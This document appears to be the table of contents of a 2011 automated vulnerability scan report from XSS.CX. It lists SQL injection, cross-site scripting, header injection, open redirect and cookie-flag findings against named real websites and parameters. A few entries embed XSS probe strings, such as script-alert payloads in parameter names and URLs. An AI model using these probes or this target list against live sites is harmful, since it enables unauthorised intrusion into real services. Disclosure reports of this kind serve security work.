CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Apr 01 09:37:54 CDT 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. SQL injection

1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

1.3. http://order.1and1.com/xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default [REST URL parameter 4]

1.4. http://order.1and1.com/xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default [Referer HTTP header]

1.5. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 2]

1.6. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 3]

1.7. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 4]

1.8. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 5]

1.9. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 6]

1.10. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [catId parameter]

1.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

1.12. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.13. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

1.14. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

1.15. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

1.16. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

1.17. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

1.18. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.19. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.20. http://www.nutter.com/careers.php [CareerID parameter]

1.21. http://www.nutter.com/careers.php [CategoryID parameter]

1.22. http://www.soundingsonline.com/archives/'+NSFTW+' [REST URL parameter 2]

1.23. http://www.soundingsonline.com/archives/'+NSFTW+' [name of an arbitrarily supplied request parameter]

1.24. http://www.soundingsonline.com/archives/'+NSFTW+' [ordering parameter]

1.25. http://www.soundingsonline.com/archives/'+NSFTW+' [searchphrase parameter]

1.26. https://www.supermedia.com/help/direct-mail [trafficSource cookie]

1.27. http://www.vcahospitals.com/tools/markers_sema.php [name of an arbitrarily supplied request parameter]

1.28. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]

2. LDAP injection

3. Cross-site scripting (stored)

3.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

3.2. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]

4.3. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adj/N6036.AOL/B5125476.4 [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]

4.7. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]

4.8. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

4.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]

5.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]

5.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]

5.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

5.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]

5.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]

5.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [adurl parameter]

5.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [ai parameter]

5.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [client parameter]

5.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [num parameter]

5.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sig parameter]

5.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sz parameter]

5.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

5.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

5.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

5.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

5.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

5.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

5.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

5.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

5.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

5.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

5.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_adid parameter]

5.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_id parameter]

5.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_uuid parameter]

5.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [redirect parameter]

5.27. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [sz parameter]

5.28. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

5.29. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

5.30. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

5.31. http://api.bing.com/qsonhs.aspx [q parameter]

5.32. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]

5.33. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]

5.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [RDRID parameter]

5.35. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]

5.36. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]

5.37. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]

5.38. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

5.39. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

5.40. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.41. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.42. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.43. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

5.44. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

5.45. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

5.46. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

5.47. http://my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

5.48. http://my-happyfeet.com/cart.asp [rp parameter]

5.49. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.50. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9 [callback parameter]

5.51. https://secure.avangate.com/order/cart.php [CART_ID parameter]

5.52. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

5.53. https://secure.avangate.com/order/checkout.php [CART_ID parameter]

5.54. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]

5.55. https://secure.shareit.com/shareit/checkout.html [prno parameter]

5.56. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

5.57. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

5.58. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

5.59. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

5.60. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

5.61. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

5.62. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

5.63. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

5.64. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

5.65. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

5.66. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

5.67. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

5.68. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

5.69. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

5.70. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

5.71. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

5.72. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

5.73. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.74. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.75. http://www.fast-report.com/bitrix/redirect.php [goto parameter]

5.76. http://www.fast-report.com/bitrix/redirect2.php [goto parameter]

5.77. http://www.fast-report.com/bitrix/redirect2.php [name of an arbitrarily supplied request parameter]

5.78. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

5.79. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

5.80. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

5.81. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

5.82. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

5.83. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

5.84. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

5.85. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

5.86. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

5.87. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

5.88. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

5.89. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

5.90. http://www.manitu.de/shop/ [account_id parameter]

5.91. http://www.manitu.de/shop/ [billc_birthdate parameter]

5.92. http://www.manitu.de/shop/ [billc_city parameter]

5.93. http://www.manitu.de/shop/ [billc_email parameter]

5.94. http://www.manitu.de/shop/ [billc_fax parameter]

5.95. http://www.manitu.de/shop/ [billc_firstname parameter]

5.96. http://www.manitu.de/shop/ [billc_lastname parameter]

5.97. http://www.manitu.de/shop/ [billc_organization parameter]

5.98. http://www.manitu.de/shop/ [billc_phone parameter]

5.99. http://www.manitu.de/shop/ [billc_street1 parameter]

5.100. http://www.manitu.de/shop/ [billc_street2 parameter]

5.101. http://www.manitu.de/shop/ [billc_title parameter]

5.102. http://www.manitu.de/shop/ [billc_zipcode parameter]

5.103. http://www.my-happyfeet.com/cart.asp [mode parameter]

5.104. http://www.my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

5.105. http://www.my-happyfeet.com/cart.asp [refurl parameter]

5.106. http://www.nutter.com/careers.php [CareerID parameter]

5.107. http://www.nutter.com/careers.php [CategoryID parameter]

5.108. http://www.paperg.com/jsfb/embed.php [bid parameter]

5.109. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]

5.110. http://www.superpages.com/inc/social/soc.php [cg parameter]

5.111. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 1]

5.112. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 2]

5.113. https://www.territoryahead.com/account/login/loginmain%20.jsp [name of an arbitrarily supplied request parameter]

5.114. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]

5.115. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]

5.116. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 1]

5.117. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 2]

5.118. https://www.territoryahead.com/jump.jsp ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter]

5.119. https://www.territoryahead.com/jump.jsp [itemID parameter]

5.120. https://www.territoryahead.com/jump.jsp [name of an arbitrarily supplied request parameter]

5.121. https://www.territoryahead.com/jump.jsp [path parameter]

5.122. https://www2.hbc.com/contactus/contact-us.asp [langid parameter]

5.123. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

5.124. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

5.125. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

5.126. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.127. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.128. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.129. https://www.territoryahead.com/account/login/loginmain%20.jsp [Referer HTTP header]

5.130. https://www.territoryahead.com/account/login/loginmain%20.jsp [User-Agent HTTP header]

5.131. https://www.territoryahead.com/jump.jsp [Referer HTTP header]

5.132. https://www.territoryahead.com/jump.jsp [User-Agent HTTP header]

5.133. http://portal.smartertools.com/ST.ashx [siteuidut cookie]

5.134. http://www.aol.com/ [dlact cookie]

5.135. https://www.territoryahead.com/account/login/loginmain%20.jsp [CoreID6 cookie]

5.136. https://www.territoryahead.com/account/login/loginmain%20.jsp [PS_ALL cookie]

5.137. https://www.territoryahead.com/account/login/loginmain%20.jsp [customer cookie]

5.138. https://www.territoryahead.com/account/login/loginmain%20.jsp [mmlID cookie]

5.139. https://www.territoryahead.com/account/login/loginmain%20.jsp [order cookie]

5.140. https://www.territoryahead.com/jump.jsp [90232094_clogin cookie]

5.141. https://www.territoryahead.com/jump.jsp [CoreID6 cookie]

5.142. https://www.territoryahead.com/jump.jsp [JSESSIONID cookie]

5.143. https://www.territoryahead.com/jump.jsp [PS_ALL cookie]

5.144. https://www.territoryahead.com/jump.jsp [cmTPSet cookie]

5.145. https://www.territoryahead.com/jump.jsp [customer cookie]

5.146. https://www.territoryahead.com/jump.jsp [mmlID cookie]

5.147. https://www.territoryahead.com/jump.jsp [order cookie]

5.148. https://www.territoryahead.com/jump.jsp [s_cc cookie]

5.149. https://www.territoryahead.com/jump.jsp [s_sq cookie]

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://aka-cdn-ns.adtechus.com/crossdomain.xml

6.3. http://api.search.live.net/crossdomain.xml

6.4. http://at.atwola.com/crossdomain.xml

6.5. http://b.scorecardresearch.com/crossdomain.xml

6.6. http://dominionenterprises.112.2o7.net/crossdomain.xml

6.7. http://imagec17.247realmedia.com/crossdomain.xml

6.8. http://learn.shavlik.com/crossdomain.xml

6.9. http://log30.doubleverify.com/crossdomain.xml

6.10. http://o.sa.aol.com/crossdomain.xml

6.11. http://oasc05139.247realmedia.com/crossdomain.xml

6.12. http://pixel.quantserve.com/crossdomain.xml

6.13. http://s0.2mdn.net/crossdomain.xml

6.14. http://secure-us.imrworldwide.com/crossdomain.xml

6.15. http://segment-pixel.invitemedia.com/crossdomain.xml

6.16. http://wsjrs2.s3.amazonaws.com/crossdomain.xml

6.17. http://www.econda-monitor.de/crossdomain.xml

6.18. http://www.huffingtonpost.com/crossdomain.xml

6.19. http://ads.tw.adsonar.com/crossdomain.xml

6.20. http://api.tweetmeme.com/crossdomain.xml

6.21. http://googleads.g.doubleclick.net/crossdomain.xml

6.22. http://js.adsonar.com/crossdomain.xml

6.23. http://music.aol.com/crossdomain.xml

6.24. http://my.screenname.aol.com/crossdomain.xml

6.25. http://o.aolcdn.com/crossdomain.xml

6.26. http://pagead2.googlesyndication.com/crossdomain.xml

6.27. http://static.ak.fbcdn.net/crossdomain.xml

6.28. http://www.aol.com/crossdomain.xml

6.29. http://www.blogsmithmedia.com/crossdomain.xml

6.30. http://www.citysbest.com/crossdomain.xml

6.31. https://www.godaddy.com/crossdomain.xml

6.32. http://www.paperg.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://api.search.live.net/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://dominionenterprises.112.2o7.net/clientaccesspolicy.xml

7.5. http://o.aolcdn.com/clientaccesspolicy.xml

7.6. http://o.sa.aol.com/clientaccesspolicy.xml

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.9. http://www.aol.com/clientaccesspolicy.xml

7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://forums.smartertools.com/login.aspx

8.2. http://www.fast-report.com/en/buy/

8.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

8.4. http://www.fast-report.com/en/download/fastreport.net-download.html

8.5. http://www.fast-report.com/en/download/fastreport.net-download.html/

8.6. http://www.fast-report.com/en/products/

8.7. http://www.fast-report.com/en/products/FastReport.Net.html

9. XML injection

9.1. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 1]

9.2. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 2]

10. SQL statement in request parameter

10.1. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

10.2. http://www.bluestarfibres.com/page.php

10.3. http://www.insideup.com/ppc/leadflow/hins00/project.php

10.4. http://www.nutter.com/careers.php

10.5. https://www.supermedia.com/spportal/spportalFlow.do

10.6. https://www.territoryahead.com/jump.jsp

11. SSL cookie without secure flag set

11.1. https://www.territoryahead.com/jump.jsp

11.2. https://feedback.discoverbing.com/default.aspx

11.3. https://www.godaddy.com/

11.4. https://www.godaddy.com/Hosting/web-hosting.aspx

11.5. https://www.godaddy.com/catalog.aspx

11.6. https://www.godaddy.com/domains/search.aspx

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

11.8. https://www.godaddy.com/hosting/website-builder.aspx

11.9. https://www.supermedia.com/spportal/spportalFlow.do

12. Session token in URL

12.1. http://a1.bing4.com/fd/fb/simls

12.2. http://order.1and1.com/xml/order

12.3. http://order.1and1.com/xml/order/CloudDynamicServer

12.4. http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3

12.5. http://order.1and1.com/xml/order/Contact

12.6. http://order.1and1.com/xml/order/DomaininfoMove

12.7. http://order.1and1.com/xml/order/Eshops

12.8. http://order.1and1.com/xml/order/Home

12.9. http://order.1and1.com/xml/order/Home

12.10. http://order.1and1.com/xml/order/Hosting

12.11. http://order.1and1.com/xml/order/Instant

12.12. http://order.1and1.com/xml/order/Jumpto

12.13. http://order.1and1.com/xml/order/LocalSubmission

12.14. http://order.1and1.com/xml/order/Mail

12.15. http://order.1and1.com/xml/order/MailInstantMail

12.16. http://order.1and1.com/xml/order/MailXchange

12.17. http://order.1and1.com/xml/order/MicrosoftExchange

12.18. http://order.1and1.com/xml/order/MsHosting

12.19. http://order.1and1.com/xml/order/Server

12.20. http://order.1and1.com/xml/order/ServerPremium

12.21. http://order.1and1.com/xml/order/Sharepoint

12.22. http://order.1and1.com/xml/order/VirtualServer

12.23. http://order.1and1.com/xml/order/sitedesign

12.24. http://pub2.camera.trafficland.com/image/live.jpg

12.25. http://sales.liveperson.net/hc/18987408/

12.26. https://secure.shareit.com/shareit/checkout.html

12.27. https://secure.shareit.com/shareit/checkout.html

12.28. http://www.facebook.com/extern/login_status.php

13. Open redirection

13.1. http://b.scorecardresearch.com/r [d.c parameter]

13.2. http://www.global-bd.net/ [name of an arbitrarily supplied request parameter]

14. Cookie scoped to parent domain

14.1. http://api.twitter.com/1/statuses/user_timeline.json

14.2. http://c.microsoft.com/trans_pixel.aspx

14.3. https://www.plimus.com/jsp/buynow.jsp

14.4. http://a1.bing4.com/fd/fb/simls

14.5. http://api.flickr.com/clientaccesspolicy.xml

14.6. http://b.aol.com/vanity/

14.7. http://b.scorecardresearch.com/b

14.8. http://b.scorecardresearch.com/p

14.9. http://b.scorecardresearch.com/r

14.10. http://c.bing.com/c.gif

14.11. http://c.microsoft.com/trans_pixel.asp

14.12. http://explore.live.com/Handlers/Plt.mvc

14.13. http://id.google.com/verify/EAAAAI8sWLg3-CQ8dVKhlM8XS4A.gif

14.14. http://leadback.advertising.com/adcedge/lb

14.15. http://pixel.mathtag.com/creative/img

14.16. http://pixel.quantserve.com/pixel

14.17. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

14.18. http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif

14.19. http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js

14.20. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.21. http://safebrowsing.clients.google.com/safebrowsing/gethash

14.22. http://tacoda.at.atwola.com/rtx/r.js

14.23. http://tags.bluekai.com/site/3200

14.24. http://tracker.marinsm.com/tp

14.25. https://www.godaddy.com/

14.26. https://www.godaddy.com/Hosting/web-hosting.aspx

14.27. https://www.godaddy.com/catalog.aspx

14.28. https://www.godaddy.com/domains/search.aspx

14.29. https://www.godaddy.com/gdshop/hosting/landing.asp

14.30. https://www.godaddy.com/hosting/website-builder.aspx

14.31. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx

15. Cookie without HttpOnly flag set

15.1. http://c.microsoft.com/trans_pixel.aspx

15.2. http://hbc.com/

15.3. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

15.4. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

15.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

15.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

15.7. http://www.aol.com/ajax.jsp

15.8. http://www.bizfind.us/ricerca.asp

15.9. http://www.cramerdev.com/

15.10. http://www.hbccards.com/

15.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

15.12. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx

15.13. http://www.paperg.com/jsfb/embed.php

15.14. https://www.plimus.com/jsp/buynow.jsp

15.15. https://www.supermedia.com/spportal/spportalFlow.do

15.16. https://www.territoryahead.com/jump.jsp

15.17. http://www.vcahospitals.com/favicon.ico

15.18. https://www2.hbc.com/contactus/contact-us.asp

15.19. http://a1.bing4.com/fd/fb/simls

15.20. http://ad.yieldmanager.com/pixel

15.21. http://ad.yieldmanager.com/unpixel

15.22. http://advertising.microsoft.com/search-advertising

15.23. http://api.flickr.com/clientaccesspolicy.xml

15.24. http://b.aol.com/vanity/

15.25. http://b.scorecardresearch.com/b

15.26. http://b.scorecardresearch.com/p

15.27. http://b.scorecardresearch.com/r

15.28. http://bing.com//us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/

15.29. http://bing.com/maps

15.30. http://blog.smartertools.com/Themes/Blogs/leanandgreen/style/DynamicStyle.aspx

15.31. http://blog.smartertools.com/archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx

15.32. http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx

15.33. http://blog.smartertools.com/themes/leanandgreen/style/DynamicStyle.aspx

15.34. http://blogs.msdn.com/Themes/MSDN2/Images/MSDN/bg_body_MSDN.png

15.35. http://blogs.msdn.com/Utility/FooterFragments/Core/UserInfoPopup.js

15.36. http://blogs.msdn.com/b/sharepoint_workspace_development_team/

15.37. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/contentpane.png

15.38. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/layout-background.png

15.39. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/logo_msdn.png

15.40. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/search2.png

15.41. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-info.gif

15.42. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-rss.gif

15.43. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-thumbnail-list.gif

15.44. http://blogs.msdn.com/themes/MSDN2/Images/icon-sprite.gif

15.45. http://blogs.msdn.com/themes/MSDN2/Images/pager-item.png

15.46. http://blogs.msdn.com/themes/MSDN2/css/DynamicStyle.aspx

15.47. http://blogs.msdn.com/themes/MSDN2/css/base.css

15.48. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-core.css

15.49. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-forums.css

15.50. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-groups.css

15.51. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-mediagalleries.css

15.52. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-messages.css

15.53. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-weblogs.css

15.54. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-wikis.css

15.55. http://blogs.msdn.com/themes/MSDN2/css/content-fragments.css

15.56. http://blogs.msdn.com/themes/MSDN2/css/footer-fragments.css

15.57. http://blogs.msdn.com/themes/MSDN2/css/header-fragments.css

15.58. http://blogs.msdn.com/themes/MSDN2/css/print.css

15.59. http://blogs.msdn.com/themes/MSDN2/css/screen.css

15.60. http://blogs.msdn.com/themes/MSDN2/favicon.ico

15.61. http://blogs.msdn.com/themes/blogs/MSDN2/css/DynamicStyle.aspx

15.62. http://blogs.msdn.com/themes/blogs/MSDN2/css/MSDNblogs.css

15.63. http://blogs.msdn.com/themes/generic/css/layout.css

15.64. http://blogs.msdn.com/themes/generic/css/layout.css

15.65. http://blogs.msdn.com/themes/msdn2/css/msdn.css

15.66. http://blogs.msdn.com/themes/msdn2/images/MSDN/widget-right.png

15.67. http://blogs.msdn.com/themes/msdn2/images/msdn/widget-left.png

15.68. http://blogs.msdn.com/utility/jquery/jquery-1.3.2.min.js

15.69. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js

15.70. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/blogmarks.gif

15.71. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/delicious.gif

15.72. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/digg.gif

15.73. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/diigo.gif

15.74. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/facebook.gif

15.75. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/fark.gif

15.76. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/faves.gif

15.77. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/friendfeed.gif

15.78. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/google.gif

15.79. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/less.gif

15.80. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/linkedin.gif

15.81. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/livefavorites.gif

15.82. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/mixx.gif

15.83. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/more.gif

15.84. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/myspace.gif

15.85. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/newsvine.gif

15.86. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/reddit.gif

15.87. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/slashdot.gif

15.88. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/stumbleupon.gif

15.89. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/technorati.gif

15.90. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/twitter.gif

15.91. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/ShareThis.js

15.92. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/sharethis.css

15.93. http://blogs.technet.com/Utility/FooterFragments/Core/UserInfoPopup.js

15.94. http://blogs.technet.com/analyticsid.aspx

